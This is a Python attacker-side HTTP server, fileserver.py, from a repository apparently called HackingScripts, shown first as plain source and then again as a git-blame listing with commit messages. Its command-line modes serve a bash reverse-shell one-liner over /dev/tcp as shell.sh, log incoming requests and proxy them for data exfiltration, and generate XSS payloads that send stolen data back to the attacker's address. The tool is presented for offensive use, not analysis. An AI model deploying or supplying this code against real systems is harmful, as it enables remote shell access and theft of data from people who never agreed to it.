HackingScripts/fileserver.py

#!/usr/bin/env python

from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse
import threading
import requests
import sys
import time
import os
import ssl
import util
import xss_handler

class FileServerRequestHandler(BaseHTTPRequestHandler):

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    def do_HEAD(self):
        self.do_GET()

    def do_POST(self):
        self.do_GET()

    def onForward(self, base_path, target):
        path = self.path[max(0, len(base_path)-1):]
        parts = urlparse(target)
        if path.startswith(parts.path):
            path = path[len(parts.path):]

        target_rewrite = target + path

        # queryStr = "" if "?" not in self.path else self.path[self.path.index("?")+1:]
        # if queryStr:
        #     target += "?" if "?" not in target else "&"
        #     target += queryStr

        contentLength = self.headers.get('Content-Length')
        data = None

        if contentLength and int(contentLength) > 0:
            data = self.rfile.read(int(contentLength))

        if "Host" in self.headers:
            del self.headers["Host"]

        method = self.command
        print(target, "=>", method, target_rewrite)
        res = requests.request(method, target_rewrite, headers=self.headers, data=data)
        return res.status_code, res.content, res.headers


    def find_route(self, path):

        if path in self.server.routes:
            return self.server.routes[path]

        for p, route in self.server.prefix_routes.items():
            if path.startswith(p):
                return route

        def not_found(req):
            return 404, b"", {}

        return not_found

    def do_OPTIONS(self):
        self.do_GET()

    def do_GET(self):
        try:
            if not self.server.is_running:
                self.send_response(200)
                self.end_headers()
                return

            path = self.server.cleanPath(self.path)
            route = self.find_route(path)
            result = route(self)

            blacklist_headers = ["transfer-encoding", "content-length", "content-encoding", "allow", "connection"]
            status_code = 200 if len(result) < 1 else result[0]
            data        = b"" if len(result) < 2 else result[1]
            headers     = { } if len(result) < 3 else result[2]

            if path in self.server.dumpRequests:
                headers["Access-Control-Allow-Origin"] = "*"

            headers["Content-Length"] = len(data)

            if len(headers) == 0:
                self.send_response(status_code)
            else:
                if path != "/dummy":
                    self.log_request(status_code)
                self.send_response_only(status_code)

                for key, value in headers.items():
                    if key.lower() not in blacklist_headers:
                        self.send_header(key, value)

                if self.command.upper() == "OPTIONS":
                    self.send_header("Allow", "OPTIONS, GET, HEAD, POST")

            self.end_headers()

            if data and self.command.upper() not in ["HEAD","OPTIONS"]:
                self.wfile.write(data)

            if (path in self.server.dumpRequests or "/" in self.server.dumpRequests) and path != "/dummy":
                contentLength = self.headers.get('Content-Length')
                body = None

                if contentLength and int(contentLength) > 0:
                    body = self.rfile.read(int(contentLength))

                print("===== Connection from:",self.client_address[0])
                print("%s %s %s" % (self.command, self.path, self.request_version))
                print(str(self.headers).strip())
                if body:
                    print()
                    print(body)
                print("==========")
        except Exception as e:
            print("Exception on handling http", str(e))

    def log_message(self, format, *args):
        if self.server.logRequests:
            super().log_message(format, *args)

class HttpFileServer(HTTPServer):
    def __init__(self, addr, port):
        super().__init__((addr, port), FileServerRequestHandler)
        self.logRequests = False
        self.routes = { }
        self.dumpRequests = []
        self.prefix_routes = { }
        self.is_running = True
        self.listen_thread = None
        self.has_exited = False

    def cleanPath(self, path):

        if "?" in path:
            path = path[0:path.find("?")]

        if not path.startswith("/"):
            path = "/" + path

        return path.strip()

    def addFile(self, name, data, mimeType=None):

        if hasattr(data, "read"):
            fd = data
            data = data.read()
            fd.close()

        if isinstance(data, str):
            data = data.encode("UTF-8")
    
        headers = { 
            "Access-Control-Allow-Origin": "*",
        }
        if mimeType:
            headers["Content-Type"] = headers

        # return 200 - OK and data
        self.addRoute(name, lambda req: (200, data, headers))

    def add_file_path(self, path, name=None):
        def readfile():
            with open(path, "rb") as f:
                return f.read()

        if name is None:
            name = os.path.basename(path)
        self.addRoute(name, lambda req: (200, readfile()))

    def load_directory(self, path, recursive=True, exclude_ext=[]):
        if not os.path.isdir(path):
            print("Not a directory:", path)
            return

        for dp, dn, filenames in os.walk(path):
            for f in filenames:
                file_path = os.path.join(dp, f)
                if not exclude_ext or os.path.splitext(file_path)[1] not in exclude_ext:
                    relative_path = file_path[len(path):]
                    self.add_file_path(file_path, relative_path)

    def dumpRequest(self, name):
        self.dumpRequests.append(self.cleanPath(name))

    def addRoute(self, path, func):
        self.routes[self.cleanPath(path)] = func

    def addPrefixRoute(self, path, func):
        self.prefix_routes[self.cleanPath(path)] = func

    def forwardRequest(self, path, target):
        self.addPrefixRoute(path, lambda req: req.onForward(path, target))

    def enableLogging(self):
        self.logRequests = True

    def enableSSL(self, keyFile="private.key", certFile="server.crt"):

        if not os.path.isfile(keyFile):
            print("Generating private key and certificate…")
            os.system("openssl req -new -x509 -keyout private.key -out server.crt -days 365 -nodes")
        elif not os.path.isfile(certFile):
            print("Generating certificate…")
            os.system("openssl req -new -x509 -keyin private.key -out server.crt -days 365 -nodes")

        self.socket = ssl.wrap_socket(self.socket,
            server_side=True,
            certfile=certFile,
            keyfile=keyFile,
            ssl_version=ssl.PROTOCOL_TLS,
            cert_reqs=ssl.CERT_NONE)

        # try:
        #     ssl._create_default_https_context = ssl._create_unverified_context
        # except AttributeError:
        #     print("Legacy Python that doesn't verify HTTPS certificates by default")
        #     pass

    def startBackground(self):
        self.listen_thread = threading.Thread(target=self.serve_forever)
        self.listen_thread.start()
        return self.listen_thread

    def start(self):
        return self.serve_forever()

    def get_base_url():
        addr, port = self.server_address
        if port != 80:
            port = f":{port}"
        protocol = "https" if gettype(self.socket) == ssl.SSLSocket else "http"
        return f"{protocol}://{addr}{port}"

    def stop(self):
        self.is_running = False
        time.sleep(1)

        try:
            # dummy request
            for i in range(3):
                requests.get(f"{self.get_base_url()}/dummy")
                if self.has_exited:
                    break
                time.sleep(1)
        except:
            pass

        if self.listen_thread != threading.currentThread():
            self.listen_thread.join()

    def serve_forever(self):
        self.has_exited = False
        while self.is_running:
            self.handle_request()
        self.has_exited = True


if __name__ == "__main__":
    if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy","xss"]:
        print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])
        exit(1)

    httpPort = 80
    fileServer = HttpFileServer("0.0.0.0", httpPort)
    ipAddress = util.get_address()

    if sys.argv[1] == "shell":
        listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2])
        rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
        fileServer.addFile("shell.sh", rev_shell)
        fileServer.dumpRequest("/")
        print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
    elif sys.argv[1] == "dump":
        fileServer.dumpRequest("/")
        print("Exfiltrate data using: http://%s/" % ipAddress)
    elif sys.argv[1] == "proxy":
        url = "https://google.com" if len(sys.argv) < 3 else sys.argv[2]
        fileServer.forwardRequest("/proxy", url)
        print("Exfiltrate data using: http://%s/proxy" % ipAddress)
    elif sys.argv[1]  == "xss":
        type = "img" if len(sys.argv) < 3 else sys.argv[2]
        xss = xss_handler.generatePayload(type, ipAddress, httpPort)
        print("Exfiltrate data using:")
        print(xss)

    fileServer.start()
FileServer 2020-09-27 14:00:20 +02:00			`#!/usr/bin/env python`

			`from http.server import BaseHTTPRequestHandler, HTTPServer`
bugfixes + exploit template 2021-05-31 14:13:01 +02:00			`from urllib.parse import urlparse`
fileserver.py 2020-09-27 14:37:52 +02:00			`import threading`
python webserver routes 2020-10-21 21:41:06 +02:00			`import requests`
fileserver.py 2020-09-27 14:37:52 +02:00			`import sys`
update 2021-12-08 17:50:48 +01:00			`import time`
File Server POST 2020-10-15 14:35:16 +02:00			`import os`
			`import ssl`
python include fix, web service finder: osticket 2021-05-12 15:58:19 +02:00			`import util`
			`import xss_handler`
FileServer 2020-09-27 14:00:20 +02:00
fileserver.py 2020-09-27 14:37:52 +02:00			`class FileServerRequestHandler(BaseHTTPRequestHandler):`
FileServer 2020-09-27 14:00:20 +02:00
fileserver.py 2020-09-27 14:37:52 +02:00			`def __init__(self, args, *kwargs):`
			`super().__init__(args, *kwargs)`
FileServer 2020-09-27 14:00:20 +02:00
python include fix, web service finder: osticket 2021-05-12 15:58:19 +02:00			`def do_HEAD(self):`
			`self.do_GET()`

File Server POST 2020-10-15 14:35:16 +02:00			`def do_POST(self):`
			`self.do_GET()`

bugfixes + exploit template 2021-05-31 14:13:01 +02:00			`def onForward(self, base_path, target):`
			`path = self.path[max(0, len(base_path)-1):]`
			`parts = urlparse(target)`
			`if path.startswith(parts.path):`
			`path = path[len(parts.path):]`

			`target_rewrite = target + path`

			`# queryStr = "" if "?" not in self.path else self.path[self.path.index("?")+1:]`
			`# if queryStr:`
			`# target += "?" if "?" not in target else "&"`
			`# target += queryStr`

			`contentLength = self.headers.get('Content-Length')`
			`data = None`

			`if contentLength and int(contentLength) > 0:`
			`data = self.rfile.read(int(contentLength))`
python webserver routes 2020-10-21 21:41:06 +02:00
Update 2021-08-28 13:41:46 +02:00			`if "Host" in self.headers:`
			`del self.headers["Host"]`

python webserver routes 2020-10-21 21:41:06 +02:00			`method = self.command`
bugfixes + exploit template 2021-05-31 14:13:01 +02:00			`print(target, "=>", method, target_rewrite)`
			`res = requests.request(method, target_rewrite, headers=self.headers, data=data)`
			`return res.status_code, res.content, res.headers`


			`def find_route(self, path):`

			`if path in self.server.routes:`
			`return self.server.routes[path]`

			`for p, route in self.server.prefix_routes.items():`
			`if path.startswith(p):`
			`return route`

			`def not_found(req):`
			`return 404, b"", {}`

			`return not_found`

			`def do_OPTIONS(self):`
			`self.do_GET()`
python webserver routes 2020-10-21 21:41:06 +02:00
FileServer 2020-09-27 14:00:20 +02:00			`def do_GET(self):`
Update 2022-03-01 14:08:53 +01:00			`try:`
			`if not self.server.is_running:`
			`self.send_response(200)`
			`self.end_headers()`
			`return`
python webserver routes 2020-10-21 21:41:06 +02:00
Update 2022-03-01 14:08:53 +01:00			`path = self.server.cleanPath(self.path)`
			`route = self.find_route(path)`
			`result = route(self)`
bugfixes + exploit template 2021-05-31 14:13:01 +02:00
Update 2022-03-01 14:08:53 +01:00			`blacklist_headers = ["transfer-encoding", "content-length", "content-encoding", "allow", "connection"]`
			`status_code = 200 if len(result) < 1 else result[0]`
			`data = b"" if len(result) < 2 else result[1]`
			`headers = { } if len(result) < 3 else result[2]`
fileserver response headers 2021-05-20 13:11:42 +02:00
Update 2022-03-01 14:08:53 +01:00			`if path in self.server.dumpRequests:`
			`headers["Access-Control-Allow-Origin"] = "*"`
update 2021-12-08 17:50:48 +01:00
Update 2022-03-01 14:08:53 +01:00			`headers["Content-Length"] = len(data)`
Project Update 2022-02-16 14:18:54 +01:00
Update 2022-03-01 14:08:53 +01:00			`if len(headers) == 0:`
			`self.send_response(status_code)`
			`else:`
			`if path != "/dummy":`
			`self.log_request(status_code)`
			`self.send_response_only(status_code)`
fileserver response headers 2021-05-20 13:11:42 +02:00
Update 2022-03-01 14:08:53 +01:00			`for key, value in headers.items():`
			`if key.lower() not in blacklist_headers:`
			`self.send_header(key, value)`
fileserver response headers 2021-05-20 13:11:42 +02:00
Update 2022-03-01 14:08:53 +01:00			`if self.command.upper() == "OPTIONS":`
			`self.send_header("Allow", "OPTIONS, GET, HEAD, POST")`
python webserver routes 2020-10-21 21:41:06 +02:00
Update 2022-03-01 14:08:53 +01:00			`self.end_headers()`
bugfixes + exploit template 2021-05-31 14:13:01 +02:00
Update 2022-03-01 14:08:53 +01:00			`if data and self.command.upper() not in ["HEAD","OPTIONS"]:`
			`self.wfile.write(data)`
FileServer 2020-09-27 14:00:20 +02:00
Update 2022-03-01 14:08:53 +01:00			`if (path in self.server.dumpRequests or "/" in self.server.dumpRequests) and path != "/dummy":`
			`contentLength = self.headers.get('Content-Length')`
			`body = None`
File Server POST 2020-10-15 14:35:16 +02:00
Update 2022-03-01 14:08:53 +01:00			`if contentLength and int(contentLength) > 0:`
			`body = self.rfile.read(int(contentLength))`
File Server POST 2020-10-15 14:35:16 +02:00
Update 2022-03-01 14:08:53 +01:00			`print("===== Connection from:",self.client_address[0])`
			`print("%s %s %s" % (self.command, self.path, self.request_version))`
			`print(str(self.headers).strip())`
			`if body:`
			`print()`
			`print(body)`
			`print("==========")`
			`except Exception as e:`
			`print("Exception on handling http", str(e))`
File Server POST 2020-10-15 14:35:16 +02:00
FileServer 2020-09-27 14:00:20 +02:00			`def log_message(self, format, *args):`
fileserver.py 2020-09-27 14:37:52 +02:00			`if self.server.logRequests:`
File Server POST 2020-10-15 14:35:16 +02:00			`super().log_message(format, *args)`
fileserver.py 2020-09-27 14:37:52 +02:00
			`class HttpFileServer(HTTPServer):`
			`def __init__(self, addr, port):`
			`super().__init__((addr, port), FileServerRequestHandler)`
			`self.logRequests = False`
python webserver routes 2020-10-21 21:41:06 +02:00			`self.routes = { }`
File Server POST 2020-10-15 14:35:16 +02:00			`self.dumpRequests = []`
bugfixes + exploit template 2021-05-31 14:13:01 +02:00			`self.prefix_routes = { }`
fileserver.stop() 2021-06-05 14:24:35 +02:00			`self.is_running = True`
update 2021-12-08 17:50:48 +01:00			`self.listen_thread = None`
			`self.has_exited = False`
fileserver.py 2020-09-27 14:37:52 +02:00
python webserver routes 2020-10-21 21:41:06 +02:00			`def cleanPath(self, path):`

			`if "?" in path:`
			`path = path[0:path.find("?")]`

			`if not path.startswith("/"):`
			`path = "/" + path`

			`return path.strip()`
fileserver.py 2020-09-27 14:37:52 +02:00
Update 2021-08-28 13:41:46 +02:00			`def addFile(self, name, data, mimeType=None):`
Update 2022-03-01 14:08:53 +01:00
			`if hasattr(data, "read"):`
			`fd = data`
			`data = data.read()`
			`fd.close()`

fileserver.py 2020-09-27 14:37:52 +02:00			`if isinstance(data, str):`
			`data = data.encode("UTF-8")`
Update 2022-03-01 14:08:53 +01:00
Project Update 2022-02-16 14:18:54 +01:00			`headers = {`
			`"Access-Control-Allow-Origin": "*",`
			`}`
Update 2021-08-28 13:41:46 +02:00			`if mimeType:`
Project Update 2022-02-16 14:18:54 +01:00			`headers["Content-Type"] = headers`

			`# return 200 - OK and data`
			`self.addRoute(name, lambda req: (200, data, headers))`
fileserver.py 2020-09-27 14:37:52 +02:00
Update 2022-03-01 14:08:53 +01:00			`def add_file_path(self, path, name=None):`
			`def readfile():`
			`with open(path, "rb") as f:`
			`return f.read()`

			`if name is None:`
			`name = os.path.basename(path)`
			`self.addRoute(name, lambda req: (200, readfile()))`

			`def load_directory(self, path, recursive=True, exclude_ext=[]):`
			`if not os.path.isdir(path):`
			`print("Not a directory:", path)`
			`return`

			`for dp, dn, filenames in os.walk(path):`
			`for f in filenames:`
			`file_path = os.path.join(dp, f)`
			`if not exclude_ext or os.path.splitext(file_path)[1] not in exclude_ext:`
			`relative_path = file_path[len(path):]`
			`self.add_file_path(file_path, relative_path)`

File Server POST 2020-10-15 14:35:16 +02:00			`def dumpRequest(self, name):`
python webserver routes 2020-10-21 21:41:06 +02:00			`self.dumpRequests.append(self.cleanPath(name))`

			`def addRoute(self, path, func):`
			`self.routes[self.cleanPath(path)] = func`

bugfixes + exploit template 2021-05-31 14:13:01 +02:00			`def addPrefixRoute(self, path, func):`
			`self.prefix_routes[self.cleanPath(path)] = func`

python webserver routes 2020-10-21 21:41:06 +02:00			`def forwardRequest(self, path, target):`
bugfixes + exploit template 2021-05-31 14:13:01 +02:00			`self.addPrefixRoute(path, lambda req: req.onForward(path, target))`
File Server POST 2020-10-15 14:35:16 +02:00
			`def enableLogging(self):`
			`self.logRequests = True`

update 2021-12-08 17:50:48 +01:00			`def enableSSL(self, keyFile="private.key", certFile="server.crt"):`

			`if not os.path.isfile(keyFile):`
			`print("Generating private key and certificate…")`
File Server POST 2020-10-15 14:35:16 +02:00			`os.system("openssl req -new -x509 -keyout private.key -out server.crt -days 365 -nodes")`
update 2021-12-08 17:50:48 +01:00			`elif not os.path.isfile(certFile):`
			`print("Generating certificate…")`
			`os.system("openssl req -new -x509 -keyin private.key -out server.crt -days 365 -nodes")`
File Server POST 2020-10-15 14:35:16 +02:00
			`self.socket = ssl.wrap_socket(self.socket,`
			`server_side=True,`
			`certfile=certFile,`
			`keyfile=keyFile,`
			`ssl_version=ssl.PROTOCOL_TLS,`
			`cert_reqs=ssl.CERT_NONE)`

			`# try:`
			`# ssl._create_default_https_context = ssl._create_unverified_context`
			`# except AttributeError:`
			`# print("Legacy Python that doesn't verify HTTPS certificates by default")`
			`# pass`

fileserver.py 2020-09-27 14:37:52 +02:00			`def startBackground(self):`
update 2021-12-08 17:50:48 +01:00			`self.listen_thread = threading.Thread(target=self.serve_forever)`
			`self.listen_thread.start()`
			`return self.listen_thread`
fileserver.py 2020-09-27 14:37:52 +02:00
python webserver routes 2020-10-21 21:41:06 +02:00			`def start(self):`
			`return self.serve_forever()`

update 2021-12-08 17:50:48 +01:00			`def get_base_url():`
			`addr, port = self.server_address`
			`if port != 80:`
			`port = f":{port}"`
			`protocol = "https" if gettype(self.socket) == ssl.SSLSocket else "http"`
			`return f"{protocol}://{addr}{port}"`

fileserver.stop() 2021-06-05 14:24:35 +02:00			`def stop(self):`
			`self.is_running = False`
update 2021-12-08 17:50:48 +01:00			`time.sleep(1)`

			`try:`
			`# dummy request`
			`for i in range(3):`
			`requests.get(f"{self.get_base_url()}/dummy")`
			`if self.has_exited:`
			`break`
			`time.sleep(1)`
			`except:`
			`pass`

			`if self.listen_thread != threading.currentThread():`
			`self.listen_thread.join()`
fileserver.stop() 2021-06-05 14:24:35 +02:00
			`def serve_forever(self):`
update 2021-12-08 17:50:48 +01:00			`self.has_exited = False`
fileserver.stop() 2021-06-05 14:24:35 +02:00			`while self.is_running:`
			`self.handle_request()`
update 2021-12-08 17:50:48 +01:00			`self.has_exited = True`
fileserver.stop() 2021-06-05 14:24:35 +02:00

fileserver.py 2020-09-27 14:37:52 +02:00			`if __name__ == "__main__":`
fileserver xss, git dumper submodules, ciphers test, exif bugfix 2021-04-30 22:50:58 +02:00			`if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy","xss"]:`
			`print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])`
python webserver routes 2020-10-21 21:41:06 +02:00			`exit(1)`
fileserver.py 2020-09-27 14:37:52 +02:00
fileserver xss, git dumper submodules, ciphers test, exif bugfix 2021-04-30 22:50:58 +02:00			`httpPort = 80`
			`fileServer = HttpFileServer("0.0.0.0", httpPort)`
Update 2022-12-09 14:54:06 +01:00			`ipAddress = util.get_address()`
python webserver routes 2020-10-21 21:41:06 +02:00
			`if sys.argv[1] == "shell":`
			`listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2])`
			`rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)`
			`fileServer.addFile("shell.sh", rev_shell)`
assertions 2023-09-07 12:09:09 +02:00			`fileServer.dumpRequest("/")`
python webserver routes 2020-10-21 21:41:06 +02:00			`print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)`
			`elif sys.argv[1] == "dump":`
some bugfixes 2021-07-17 17:44:21 +02:00			`fileServer.dumpRequest("/")`
Update 2021-08-28 13:41:46 +02:00			`print("Exfiltrate data using: http://%s/" % ipAddress)`
python webserver routes 2020-10-21 21:41:06 +02:00			`elif sys.argv[1] == "proxy":`
fileserver xss, git dumper submodules, ciphers test, exif bugfix 2021-04-30 22:50:58 +02:00			`url = "https://google.com" if len(sys.argv) < 3 else sys.argv[2]`
			`fileServer.forwardRequest("/proxy", url)`
python webserver routes 2020-10-21 21:41:06 +02:00			`print("Exfiltrate data using: http://%s/proxy" % ipAddress)`
fileserver xss, git dumper submodules, ciphers test, exif bugfix 2021-04-30 22:50:58 +02:00			`elif sys.argv[1] == "xss":`
			`type = "img" if len(sys.argv) < 3 else sys.argv[2]`
			`xss = xss_handler.generatePayload(type, ipAddress, httpPort)`
			`print("Exfiltrate data using:")`
			`print(xss)`
python webserver routes 2020-10-21 21:41:06 +02:00
			`fileServer.start()`